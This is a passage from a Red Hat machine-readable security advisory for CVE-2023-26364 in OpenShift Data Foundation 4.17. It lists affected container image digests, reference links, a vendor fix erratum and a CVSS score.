"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26364"
},
{
"category": "external",
"summary": "RHBZ#2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26364",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26364"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364"
},
{
"category": "external",
"summary": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg",
"url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg"
}
],
"release_date": "2023-11-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "No mitigation is yet available for this vulnerability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
